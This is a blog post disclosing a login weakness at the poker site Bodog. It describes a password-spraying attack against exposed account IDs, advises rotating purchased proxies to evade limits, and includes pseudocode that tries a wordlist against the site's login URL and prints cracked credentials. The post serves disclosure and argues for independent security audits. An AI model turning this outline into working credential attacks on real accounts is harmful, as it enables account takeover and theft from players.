Bodog Account Security Vulnerability: PartyCrasher Exploit Part 2

Yesterday we posted an article about how Bodog’s anonymous tables weren’t so anonymous after all. We accompanied this with a video showing how this was true:

Bodog’s response was to cover it up and not really address the root problem: The violation of server-client trust. They went on to say:

Your money is and has always been safe at Bodog. If you are concerned about the security of your account, having access to an account number is similar to having a screenname before our latest update.

In a future blog post we’ll talk about how the only secure method of user authentication is the Two-Factor Model, but that’s not the focus today.

As we like to say here at hhSmithy:

Showing Usernames / Account IDs is Safe… Right?

Bodog claims that showing the account IDs of a user is inherently safe, because a hacker would still need your password to log in. Forgetting for a second that this claim implicitly admits that they blatantly lied about having anonymous tables, they’re saying that their system is secure because an attack on the users’ passwords is impossible on Bodog.

Well, maybe it is and maybe it isn’t. According to Gus Fritchie and Mike Wright, Bodog’s software has numerous cross-site scripting (XSS) vulnerabilities and an exposed web API for logging in. (source: Getting F***** on the River, Defcon 19)

When we looked into these problems, many of them still existed. However, we’ll only talk about one method of attack on the web API, since it’s vulnerable to a brute force attempt.

The Attack: Lax Security in their Log-In Form

On Bodog’s log-in form, they will lock someone out for multiple attempts on a given user ID with the incorrect password. The lockout period is a few minutes, which ensures someone can’t brute force a single username in a reasonable timeframe. However, the shotgun method works fine! Simply writing a script that gathers a bunch of usernames from a tool like PartyCrasher (not publicly available, please stop asking) and pairing this with a wordlist of passwords, you can try every user you’ve found with every password – ensuring you don’t hit the timeout for any given username!

Since they don’t ban on IP, no proxies are necessary – but implementing them isn’t hard, either. You can find free lists of proxies and purchase the rights to thousands of more IPs for less than $100/month, and you can cycle your brute force script through these proxies – perhaps limiting the attack to 200 attempts per proxy.

The video below details the attack with a voiceover explanation:

Pseudocode for the Attack

Here’s the pseudocode shown in the video that gives you a basic outline on how a hacker might start their script to bust various user passwords. Remember, Bodog only enforces a six character password without the need for mixed case, special characters, numbers, or anything exciting. I’ve made multiple accounts there with the password of “password” or “bodogpoker” with no problem. You can be sure that plenty of users have simple passwords, too.

// username and password global lists username = array('4025500', '1240159', '8856161', ...) password = array('password', 'bodogpoker', 'badbeats', ...) // attempts a bodog login with a username and password function attemptBodogLogin(user,pass) failure = 'Required information' // failure string response = webFormSubmit('https://www.bodog.eu/account/app/Login', user, pass) // submit a form with user and password if (response == failure) return FALSE // nope, user and pass pair failed else return TRUE // hacked! // tells you if the bodog login succeeds and prints account details function hackUser(user, pass) result = attemptBodogLogin(user, pass) if (result == TRUE) print 'Broken password! User: ' . user print 'Password: ' . pass // main function that is called first, nested for loop (O(n*m) for nerds) function main() foreach(password as pass) // for every password in the list foreach(username as user) // for every username in the list hackUser(user, pass) // try a user with the first pass endforeach // next user, try the same password endforeach // next password, loop through the userlist again

Conclusion

Bodog and other sites like it must subject themselves to independent analysis if they ever want to claim that they’re secure. There are numerous hackers out there doing exactly what we’re doing without disclosing anything. They’re stealing money left and right and using poor software code to write exploitative bots. The only poker site who even comes close to doing a good job is PokerStars, and it’s not even clear that some attacks won’t work there.

The need for independent analysis has never been greater with the possibility of legalization of online poker. It comes hand in hand with regulation. Demand it.

Author Info: Article written and posted by .